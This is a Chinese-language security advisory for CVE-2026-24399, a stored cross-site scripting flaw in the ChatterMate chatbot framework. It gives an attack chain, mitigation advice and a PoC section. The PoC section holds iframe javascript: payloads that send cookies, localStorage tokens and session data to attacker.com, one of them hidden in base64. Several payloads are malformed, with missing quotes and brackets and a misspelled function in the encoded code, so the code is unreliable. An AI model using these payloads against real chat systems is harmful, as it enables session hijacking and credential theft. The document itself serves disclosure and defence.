CVE-2026-24399 ChatterMate聊天机器人XSS跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2026-24399

漏洞类型

XSS跨站脚本攻击 / 客户端注入

CVSS评分

9.3 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

ChatterMate (no-code AI chatbot agent framework)

漏洞概述

ChatterMate是一个无代码AI聊天机器人代理框架，在1.0.8及更早版本中存在严重的跨站脚本(XSS)漏洞。该漏洞允许攻击者通过聊天输入注入并执行恶意HTML/JavaScript代码，特别是包含javascript: URI的<iframe>标签。框架在处理用户输入时缺乏充分的输入验证和输出编码，导致恶意payload被直接渲染为可执行代码。当受害者与聊天机器人交互并查看包含恶意payload的消息时，浏览器会执行注入的JavaScript代码。攻击者可以利用此漏洞窃取存储在客户端的敏感数据，包括localStorage中的认证令牌、会话cookies以及其他凭据信息。由于CVSS评分高达9.3，且攻击可通过网络实施，复杂度低，不需要认证即可利用，因此该漏洞极易被大规模扫描和利用，可能导致大量用户的会话被劫持、敏感数据泄露以及进一步的供应链攻击。

技术细节

漏洞根源在于ChatterMate框架对用户输入的过滤机制存在缺陷。具体来说，当用户向聊天机器人发送消息时，框架未能正确识别和过滤包含javascript:协议的<iframe>标签。攻击者可以构造如下payload：<iframe src="javascript:alert(document.cookie)">，该payload会被框架解析并存储。当其他用户查看包含此payload的聊天记录时，浏览器会执行其中的JavaScript代码。由于框架架构允许直接访问浏览器的localStorage和document.cookie对象，恶意脚本能够轻易获取存储在客户端的认证令牌、会话ID、用户偏好设置等敏感信息。攻击者还可以将窃取的数据发送到外部服务器，实现对受害者会话的劫持。此外，由于该框架的no-code特性，攻击者无需深入了解目标系统的内部结构，只需通过聊天接口即可实施攻击，大大降低了攻击门槛。

攻击链分析

STEP 1

步骤1

攻击者识别目标网站使用ChatterMate框架（版本≤1.0.8）

STEP 2

步骤2

攻击者构造包含javascript: URI的恶意<iframe> payload

STEP 3

步骤3

通过聊天接口向目标聊天机器人发送恶意payload

STEP 4

步骤4

恶意payload被存储在聊天记录中，等待其他用户访问

STEP 5

步骤5

受害者与聊天机器人交互或查看聊天记录

STEP 6

步骤6

浏览器解析并执行注入的JavaScript代码

STEP 7

步骤7

恶意脚本窃取localStorage tokens和cookies

STEP 8

步骤8

窃取的数据被发送到攻击者控制的服务器

STEP 9

步骤9

攻击者利用窃取的凭证进行会话劫持或其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2026-24399 PoC - ChatterMate XSS via iframe with javascript: URI -->

<!-- Basic XSS PoC -->
<iframe src="javascript:alert('XSS')</iframe>

<!-- Cookie Stealing PoC -->
<iframe src="javascript:fetch('https://attacker.com/steal?cookie='+encodeURIComponent(document.cookie))</iframe>

<!-- localStorage Token Exfiltration PoC -->
<iframe src="javascript:eval(atob('dmFyIGRhdGE9bG9jYWxTdG9yYWdlO2Zvcih2YXIga2V5IGluIGRhdGEpe2lmKGRhdGFba2V5XS5pbmRleE9mKCd0b2tlbicpIT09LTEpe2ZldGNoKCdodHRwczovL2F0dGFja2VyLmNvbS9jb2xsZWN0P2tleT0nK2VuY29kZVVSSVBjb21wb25lbnQoa2V5KSsnJnZhbHVlPScrZW5jb2RlVVJJQ29tcG9uZW50KGRhdGFba2V5XSkpfX0='))></iframe>

<!-- Session Hijacking PoC -->
<iframe src="javascript:var xhr=new XMLHttpRequest();xhr.open('POST','https://attacker.com/capture',true);xhr.send(JSON.stringify({cookies:document.cookie,storage:localStorage,url:location.href}));"></iframe>

影响范围

ChatterMate <= 1.0.8

ChatterMate < 1.0.9

防御指南

临时缓解措施

立即升级ChatterMate到1.0.9版本以修复该漏洞。在升级前，可临时采取以下缓解措施：在Web应用防火墙(WAF)中配置规则，拦截包含javascript:协议的请求；实施严格的输入验证，拒绝包含<iframe>、<script>等危险HTML标签的输入；启用Content-Security-Policy响应头，限制脚本执行；监控聊天记录中的异常payload模式；限制聊天机器人的输入长度和字符类型，减少攻击面。